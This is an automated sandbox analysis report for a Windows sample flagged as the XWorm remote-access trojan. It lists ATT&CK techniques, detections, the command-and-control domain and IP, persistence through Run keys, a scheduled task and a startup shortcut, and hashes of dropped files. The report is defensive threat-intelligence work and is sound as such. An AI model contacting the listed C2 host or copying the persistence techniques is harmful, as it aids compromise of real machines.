            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		21
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		1
            DLL Side-Loading            		21
            Registry Run Keys / Startup Folder            		141
            Virtualization/Sandbox Evasion            		Security Account Manager141
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		12
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain Credentials23
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575207 Sample: aZDwfEKorn.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 40 audio-clouds.gl.at.ply.gg 2->40 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 12 other signatures 2->52 8 aZDwfEKorn.exe 1 6 2->8         started        13 boost 2->13         started        15 svchost.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 42 audio-clouds.gl.at.ply.gg 147.185.221.24, 28408, 49826, 49887 SALSGIVERUS United States 8->42 38 C:\Users\user\AppData\Roaming\boost, PE32 8->38 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 68 2 other signatures 8->68 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 19 8->24         started        26 2 other processes 8->26 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 44 127.0.0.1 unknown unknown 15->44 file6 signatures7 process8 signatures9 54 Loading BitLocker PowerShell Module 19->54 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            aZDwfEKorn.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            aZDwfEKorn.exe100%AviraTR/Spy.Gen
            aZDwfEKorn.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\boost100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Roaming\boost100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\boost82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.m:t0%Avira URL Cloudsafe
            audio-clouds.gl.at.ply.gg100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            audio-clouds.gl.at.ply.gg
            		147.185.221.24
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              audio-clouds.gl.at.ply.ggtrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1360053265.000001A1240F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1442850240.000002979D871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1629972370.00000225E979E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://crl.mpowershell.exe, 00000007.00000002.1367393487.000001A12C853000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://g.live.com/odclientsettings/Prod1C:edb.log.24.drfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1342572886.000001A1142A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978DA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D995A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1342572886.000001A1142A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978DA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D995A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1360053265.000001A1240F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1442850240.000002979D871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1629972370.00000225E979E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.microsoft.copowershell.exe, 00000010.00000002.1935684002.0000027827BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.m:tpowershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.micpowershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Iconpowershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000018.00000003.2075055763.000002A272920000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.drfalse
                                          		high
                                          http://crl.ver)svchost.exe, 00000018.00000002.2528359798.000002A272A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.microsoft.powershell.exe, 00000007.00000002.1366608931.000001A12C706000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1931766181.0000027827A58000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.micft.cMicRosofpowershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore68powershell.exe, 00000007.00000002.1342572886.000001A114081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978D801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D9731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F4D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameaZDwfEKorn.exe, 00000000.00000002.2528923566.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1342572886.000001A114081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978D801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D9731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F4D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      147.185.221.24
                                                      		audio-clouds.gl.at.ply.ggUnited States
                                                      		12087SALSGIVERUStrue

                                                      Private

                                                      IP
                                                      127.0.0.1

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1575207
                                                      Start date and time:2024-12-14 18:51:06 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 7s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:28
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:aZDwfEKorn.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:803c3419bd5a171884ff51f1d75ce521a505e817fd42f1d52ac0de3c33f6dfca.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@21/25@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 14.3%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 71
                                                      • Number of non-executed functions: 11
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 4.245.163.56
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target boost, PID 1532 because it is empty
                                                      • Execution Graph export aborted for target boost, PID 8088 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 5408 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7188 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: aZDwfEKorn.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      12:52:05API Interceptor62x Sleep call for process: powershell.exe modified
                                                      14:18:36API Interceptor101x Sleep call for process: aZDwfEKorn.exe modified
                                                      14:18:45API Interceptor2x Sleep call for process: OpenWith.exe modified
                                                      14:18:47API Interceptor2x Sleep call for process: svchost.exe modified
                                                      20:18:37Task SchedulerRun new task: boost path: C:\Users\user\AppData\Roaming\boost
                                                      20:18:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boost C:\Users\user\AppData\Roaming\boost
                                                      20:18:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boost C:\Users\user\AppData\Roaming\boost
                                                      20:18:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boost.lnk

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      147.185.221.24HdTSntLSMB.exeGet hashmaliciousXWormBrowse
                                                        file.exeGet hashmaliciousXWormBrowse
                                                          file.exeGet hashmaliciousXWormBrowse
                                                            NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                              a4lIk1Jrla.exeGet hashmaliciousNjrat, RevengeRATBrowse
                                                                W6s1vzcRdj.exeGet hashmaliciousXWormBrowse
                                                                  u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                                    aOi4JyF92S.exeGet hashmaliciousXWormBrowse
                                                                      PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        a4BE6gJooT.exeGet hashmaliciousXWormBrowse

                                                                          Domains

                                                                          No context

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          SALSGIVERUSHdTSntLSMB.exeGet hashmaliciousXWormBrowse
                                                                          • 147.185.221.24
                                                                          7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                          • 147.185.221.18
                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                          • 147.185.221.24
                                                                          testingg.exeGet hashmaliciousNjratBrowse
                                                                          • 147.185.221.19
                                                                          Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                          • 147.185.221.224
                                                                          system404.exeGet hashmaliciousMetasploitBrowse
                                                                          • 147.185.221.19
                                                                          Discord.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 147.185.221.18
                                                                          CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                          • 147.185.221.22
                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                          • 147.185.221.24
                                                                          NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                                          • 147.185.221.24

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1310720
                                                                          Entropy (8bit):0.7067251849850256
                                                                          Encrypted:false
                                                                          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqu:2JIB/wUKUKQncEmYRTwh0a
                                                                          MD5:8528E20C3EBE731706D5B22BF92CF9BE
                                                                          SHA1:ECF03D2D8CEF7AF835466B224E5338AE6776E1FB
                                                                          SHA-256:0608030078FCE5FF63881501BBBBD3D500986674B41B52A499AC3128E320775C
                                                                          SHA-512:7D6C01F5A0CEAB42B843471DCB78DC76F47312D7305683FB495FE894DA563F9C3C048C70E36255A2687A9CDE6937311B1207646E7A35362FED34A524346A9928
                                                                          Malicious:false
                                                                          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x41b63728, page size 16384, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):1310720
                                                                          Entropy (8bit):0.7899982988226537
                                                                          Encrypted:false
                                                                          SSDEEP:1536:jSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:jazaPvgurTd42UgSii
                                                                          MD5:BC16B651AC2A0C4D9A3A2EF756838EF3
                                                                          SHA1:C3533ED983C0FAC4FCCCB047747D93E668A29787
                                                                          SHA-256:57460727560866CD98CDF1A89A77D3F84C887ED7775BF2EB7D4A468D652969B1
                                                                          SHA-512:C8729193DA6B6F64B6E2974B54FB18B460928EC39433D3110D8DDACACF5DDB7B1EFD83231439C69112A3250E84D4048BAC3B29906C5FC75B796FFE4591A12057
                                                                          Malicious:false
                                                                          Preview:A.7(... ...............X\...;...{......................0.`.....42...{5./....|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................\q.^/....|...................=g{/....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):16384
                                                                          Entropy (8bit):0.08115690217178644
                                                                          Encrypted:false
                                                                          SSDEEP:3:h0tEYe9jeqt/57Dek3J7drSillEqW3l/TjzzQ/t:h7z9jPR3tJ/md8/
                                                                          MD5:5EC972A82B52D79D396D43D46A43428A
                                                                          SHA1:B05C28B6A50A6FB3BBDE0C368F69100D0B38CED6
                                                                          SHA-256:2F44E664DF055FAC075AA97EB87A637C4A3012855863BCF9ABBF8E8B4F281150
                                                                          SHA-512:0839274AE3D09FFBE935E554369F58583C1763EF3700A2E228FAE6D8CB507245D7FB9B91EF5334F5B9A2BF79251C69ADB9767628CC1277B871EE288D2D9F25DC
                                                                          Malicious:false
                                                                          Preview:m.X......................................;...{../....|..42...{5.........42...{5.42...{5...Y.42...{59.................=g{/....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\boost.log

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\boost
                                                                          File Type:CSV text
                                                                          Category:dropped
                                                                          Size (bytes):654
                                                                          Entropy (8bit):5.380476433908377
                                                                          Encrypted:false
                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.34726597513537405
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlll:Nll
                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                          Malicious:false
                                                                          Preview:@...e...........................................................

                                                                          C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\aZDwfEKorn.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):41
                                                                          Entropy (8bit):3.7195394315431693
                                                                          Encrypted:false
                                                                          SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                          MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                          SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                          SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                          SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                          Malicious:false
                                                                          Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ukuc3qt.zc0.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2j43w4tg.wdo.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kzcv2xs.mh3.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arimybcm.3ke.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_auhweddo.sso.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dm4lxlgd.zru.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqodoire.iiq.ps1

                                                                          Download File
